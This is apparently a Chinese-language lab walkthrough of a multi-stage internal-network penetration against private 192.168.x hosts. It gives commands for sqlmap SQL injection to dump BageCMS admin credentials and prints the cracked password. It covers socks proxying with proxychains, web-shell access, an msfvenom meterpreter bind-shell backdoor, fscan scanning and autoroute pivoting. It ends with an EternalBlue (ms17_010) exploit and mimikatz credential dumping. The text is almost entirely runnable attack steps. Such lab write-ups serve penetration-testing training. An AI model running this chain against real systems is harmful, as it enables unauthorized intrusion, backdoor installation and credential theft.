目录
八哥cms的后台历史漏洞
配置socks代理
以我的kali为例,手动添加
socks配置好了,直接sqlmap跑
登录进后台
蚁剑配置socks代理
测试连接 编辑
成功上线
上传正向后门
生成正向后门
上传后门
内网信息收集
进入目标二内网机器,搞个路由转发
方法一
在知道账户密码的情况下流量代理转发就可以远程连接桌面
方法二
永恒之蓝打
成功打入,拿下内网三的主机
获取密码凭证,获得密码后就可以用方法一进行远程桌面连接
八哥cms的后台历史漏洞
该路径存在sql注入漏洞,利用sqlmap跑出账户和密码
http://192.168.22.22/index.php?r=vul&keyword=1
配置socks代理
因为他是在内网里面,配置socks流量转发代理
vim /etc/proxychains4.conf
以我的kali为例,手动添加
socks 192.168.20.128 20000 #上面我socks转发代理用的就是20000端口
socks配置好了,直接sqlmap跑
proxychains sqlmap -u 'http://192.168.22.22/index.php?r=vul&keyword=1' -p keyword --dbs
proxychains sqlmap -u 'http://192.168.22.22/index.php?r=vul&keyword=1' -p keyword -D bagecms --tables
proxychains sqlmap -u 'http://192.168.22.22/index.php?r=vul&keyword=1' -p keyword -D bagecms -T bage_admin --dump
登录进后台
账户:admin
密码:123qwe
看到后台网页首页的源代码,如果有php一句话就开始尝试,没有就直接手动添加
蚁剑配置socks代理
测试连接
成功上线
上传正向后门
生成正向后门
msfvenom -p linux/x64/meterpreter/bind_tcp lport=30000 -f elf -o 30000_bind.elf
上传后门
记得给后门执行权限
先上线再监听,因为这个是正向shell
handler -p linux/x64/meterpreter/bind_tcp -H 192.168.22.22 -P 30000
内网信息收集
./fscan -h 192.168.33.0/24
进入目标二内网机器,搞个路由转发
run autoroute -s 192.168.33.0/24
方法一
在知道账户密码的情况下流量代理转发就可以远程连接桌面
proxychains rdesktop -u administrator -p root 192.168.33.33
方法二
永恒之蓝打
search ms17_010
use 1
set payload windows/x64/meterpreter/bind_tcp #正向shell
set rhost 192.168.33.33 #目标内网三的ip
set lport 30001 #内网三设置一个开启的端口
run
成功打入,拿下内网三的主机
获取密码凭证,获得密码后就可以用方法一进行远程桌面连接
load kiwi #就是咱们那个mimikatz
creds_all #看凭证获取密码